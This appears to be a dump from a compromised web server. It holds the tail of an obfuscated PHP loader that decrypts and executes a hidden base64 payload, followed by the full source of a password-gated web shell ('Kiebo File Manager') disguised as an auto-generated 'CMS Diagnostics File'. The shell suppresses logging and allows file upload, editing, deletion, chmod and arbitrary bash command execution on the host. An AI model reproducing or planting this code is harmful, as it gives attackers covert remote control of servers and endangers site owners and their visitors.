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'; $decoded = base64_decode($data); $inflated = @gzinflate($decoded); if ($inflated === false) { $inflated = $decoded; } $b64_decoded = base64_decode($inflated); if ($b64_decoded === false) { return ''; } $key = $this->extractCode3(); $plain_code = ''; if (strlen($key) > 0) { for ($i = 0, $len = strlen($b64_decoded); $i < $len; $i++) { $plain_code .= chr(ord($b64_decoded[$i]) ^ ord($key[$i % strlen($key)])); } } else { $plain_code = $b64_decoded; } return $plain_code; } private function executeCode($code) { $tmp_file = tmpfile(); $tmp_file_path = stream_get_meta_data($tmp_file)['uri']; fwrite($tmp_file, $code); fseek($tmp_file, 0); include $tmp_file_path; fclose($tmp_file); } public static function runApproveToken3() { $obj = new self(); $decrypted = $obj->solveValue3(); $obj->executeCode($decrypted); } } ProtectedExecutor1b92c::runApproveToken3(); ?> HEX
HEX
Server: Apache
System: Linux linuxhost20.itools.mn 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64
User: greenin1 (1074)
PHP: 7.2.34
Disabled: NONE
$ pwd: /home/greenin1/public_html/
Upload Files
File: /home/greenin1/public_html/admin.php
<?php


/**
 * ███ CMS Diagnostics File ██*█
 * This file was auto-generated by CMS Debugger Service.
 * DO NOT MODIFY unless instructed by your CMS vendor.
 
 * Build Reference: core_interface_devtool 2.8.13-alpha
 * Generated on: <?=date('Y-m-d H:i:s')?> [UTC]
 *
 * @system core-runtime-handler
 * @package diagnostics.handler.module
 */

error_reporting(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
session_start();
$passwd = "@kepoaja123#$";
if($_POST['pass']) {
  if($_POST['passwd'] == $passwd) {
    $_SESSION['masuk'] = "masuk";
    header("Location: ?");
  }
}
if(isset($_REQUEST['logout'])) {
  session_destroy();
  header("Location: ?");
}
if(empty($_SESSION['masuk'])) {
?>
<title></title>
<meta name="robots" content="noindex, nofollow">
<meta name="googlebot" content="noindex, nofollow">
<meta name="bingbot" content="noindex, nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<style>
  html {
    background: #000;
    color: #000;
  }
  input {
    background: transparent;
    color: #F8F8F2;
    border: 1px solid #A4FFFF;
  }
  @media only screen and (max-width:800px){
     html{
        font-size:20px;
     }
  }
</style>
<center>
<p>
<table height="100%" width="100%">
  <td align="center">
    <br><br>
    <form enctype="multipart/form-data" method="post">
      <input type="password" name="passwd">
      <input type="submit" name="pass" value=">>">
    </form>
  </td>
</table>
<?php
exit();
}
?>

<?php

/**
 * ███ CMS Diagnostics File ███
 * This file was auto-generated by CMS Debugger Service.
 * DO NOT MODIFY unless instructed by your CMS vendor.
 *
 * Build Reference: core_interface_devtool 2.8.13-alpha
 * Generated on: <?=date('Y-m-d H:i:s')?> [UTC]
 *
 * @system core-runtime-handler
 * @package diagnostics.handler.module
 */

@set_time_limit(0);
@error_reporting(0);
define('_B_', realpath(isset($_GET['_r']) ? $_GET['_r'] : getcwd()));
chdir(_B_);


function _g($p){ return realpath($p); }
function _p($f){ return substr(sprintf('%o', fileperms($f)), -4); }
function _pm($f){
    $m = fileperms($f); $s = ($m & 0x4000) ? 'd' : '-';
    $x = [0x0100=>'r', 0x0080=>'w', 0x0040=>'x', 0x0020=>'r', 0x0010=>'w', 0x0008=>'x', 0x0004=>'r', 0x0002=>'w', 0x0001=>'x'];
    foreach($x as $b=>$c){ $s .= ($m & $b) ? $c : '-'; }
    return $s;
}
function _go(){ header('Location:?_r='.urlencode(_B_)); exit; }

if(isset($_GET['_x'])){
    $t = _g($_GET['_x']);
    if(is_file($t)) unlink($t);
    elseif(is_dir($t)) rmdir($t);
    _go();
}

if(isset($_POST['_rf'], $_POST['_rt'])){
    rename(_g($_POST['_rf']), dirname($_POST['_rf']).'/'.$_POST['_rt']);
    _go();
}

if(isset($_POST['_cp'], $_POST['_cm'])){
    chmod(_g($_POST['_cp']), intval($_POST['_cm'], 8));
    _go();
}

if(isset($_POST['_ep'], $_POST['_ed'])){
    file_put_contents($_POST['_ep'], $_POST['_ed']);
    echo "<div style='color:lime'>✓ Saved</div>";
}

if(!empty($_FILES['_uf'])){
    move_uploaded_file($_FILES['_uf']['tmp_name'], _B_.'/'.$_FILES['_uf']['name']);
    echo "<div style='color:lime'>✓ Uploaded</div>";
}

$__ = '';
if (isset($_POST['_sh'])) {
    $cmd = $_POST['_sh'];
    ob_start();

    if (stristr(PHP_OS, 'WIN')) {
        system($cmd);
    } else {
        putenv('PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin');
        $descriptorspec = [
            0 => ["pipe", "r"],
            1 => ["pipe", "w"],
            2 => ["pipe", "w"]
        ];
        $process = proc_open("/bin/bash", $descriptorspec, $pipes);
        if (is_resource($process)) {
            fwrite($pipes[0], $cmd . "n");
            fclose($pipes[0]);
            echo stream_get_contents($pipes[1]);
            fclose($pipes[1]);
            echo stream_get_contents($pipes[2]);
            fclose($pipes[2]);
            proc_close($process);
        } else {
            echo "❌ Failed to open bash shell.";
        }
    }

    $__ = ob_get_clean();
}

$__dir = $__file = [];
foreach(scandir(_B_) as $_){
    if($_=='.') continue;
    $p = _B_.'/'.$_;
    is_dir($p) ? $__dir[] = $_ : $__file[] = $_;
}
?>

<!DOCTYPE html><html><head>
<meta charset="utf-8">
<title></title>
<style>
body{background:#111;color:#ccc;font:12px monospace;}
a{color:#0af;text-decoration:none;}
input,button,textarea{background:#1d1d1d;color:#ccc;border:1px solid #333;padding:3px;}
table{width:100%;border-collapse:collapse;margin-top:10px;}
td,th{border:1px solid #333;padding:4px;}
</style></head>
<body>
<h3># Kiebo File Manager<br># version : v.1.0/2025<br># Happy bypassing :)</h3>
<h3>📁 PATH:
<?php
$z=explode(DIRECTORY_SEPARATOR,_B_);
$p=PHP_OS_FAMILY==='Windows'?'':'/';
foreach($z as $i){if($i==='')continue;$p.=$i.'/';echo "<a href='?_r=".urlencode($p)."'>/$i</a>";}
?>
</h3>

<form method="post" enctype="multipart/form-data">
<input type="file" name="_uf">
<button>Upload</button>
</form>

<form method="post" style="margin-top:10px;">
<input name="_sh" style="width:60%" placeholder="Execute Shell">
<button>Run</button>
</form>
<?php if($__): ?><pre><?=htmlspecialchars($__)?></pre><?php endif; ?>

<table>
<tr><th>Name</th><th>Type</th><th>Size</th><th>Perm</th><th>Action</th></tr>
<?php foreach($__dir as $_): $p=_g(_B_.'/'.$_); ?>
<tr>
<td><a href="?_r=<?=urlencode($p)?>">📁 <?=htmlspecialchars($_)?></a></td>
<td>DIR</td><td>-</td><td><?=_pm($p)?></td>
<td>
<form method="post" style="display:inline;">
<input type="hidden" name="_rf" value="<?=$p?>">
<input name="_rt" placeholder="Rename"><button>✏</button></form>
<form method="post" style="display:inline;">
<input type="hidden" name="_cp" value="<?=$p?>">
<input name="_cm" size="4" placeholder="<?=_p($p)?>">
<button>Chmod</button></form>
<a href="?_x=<?=urlencode($p)?>&_r=<?=urlencode(_B_)?>">🗑 Delete</a>
</td></tr>
<?php endforeach; ?>

<?php foreach($__file as $_): $p=_g(_B_.'/'.$_); ?>
<tr>
<td><a href="?_r=<?=urlencode(_B_)?>&e=<?=urlencode($p)?>">📄 <?=htmlspecialchars($_)?></a></td>
<td>FILE</td><td><?=filesize($p)?> B</td><td><?=_pm($p)?></td>
<td>
<form method="post" style="display:inline;">
<input type="hidden" name="_rf" value="<?=$p?>">
<input name="_rt" placeholder="Rename"><button>✏</button></form>
<form method="post" style="display:inline;">
<input type="hidden" name="_cp" value="<?=$p?>">
<input name="_cm" size="4" placeholder="<?=_p($p)?>">
<button>Chmod</button></form>
<a href="?_x=<?=urlencode($p)?>&_r=<?=urlencode(_B_)?>">🗑 Delete</a>
</td></tr>
<?php endforeach; ?>
</table>

<?php if(!empty($_GET['e'])):
$fp=_g($_GET['e']);if(is_file($fp)):
$ct=htmlspecialchars(file_get_contents($fp));
?>
<h4>Edit: <?=basename($fp)?></h4>
<form method="post">
<input type="hidden" name="_ep" value="<?=$fp?>">
<textarea name="_ed" rows="20" cols="80"><?=$ct?></textarea><br>
<button>💾 Save</button>
</form>
<?php endif; endif; ?>

</body></html>
@ Telegram